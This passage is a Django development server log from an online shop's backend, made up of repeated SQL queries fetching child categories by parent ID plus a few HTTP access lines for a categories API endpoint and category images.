ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:31:09,640 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:31:09,643 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:31:09,646 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:31:09,650 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:31:09,652 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:31:09,655 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:31:09,657 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:31:09,659 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:31:09,663 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:31:09,666 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:31:09,669 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:31:09,673 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:31:09,675 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:31:09,678 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:31:09,681 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:31:09,683 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:31:09,685 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:31:09,689 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:31:09,691 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:31:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:34:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:36:36,486 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:36:36,493 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:36:36,496 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:36:36,499 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:36:36,503 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:36:36,505 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:36:36,507 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:36:36,510 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:36:36,512 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:36:36,515 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:36:36,518 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:36:36,520 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:36:36,522 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:36:36,525 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:36:36,528 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:36:36,531 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:36:36,533 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:36:36,535 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:36:36,537 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:36:36,541 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:36:36,544 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:36:36,546 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:36:36,549 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:36:36,552 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:36:36,554 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:36:36,558 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:36:36,560 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:36:36,563 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:36:36,565 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:36:36,567 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:36:36,570 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:36:36,575 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:36:36,578 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:36:36,580 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:36:36,583 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:36:36,586 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:36:36,589 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:36:36,591 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:36:36,593 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:36:36,596 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:36:36,598 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:36:36,601 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:36:36,603 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:36:36,606 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:36:36,609 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:36:36,611 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:36:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:36:37] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:36:37] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 10:36:58,941 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:36:58,947 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 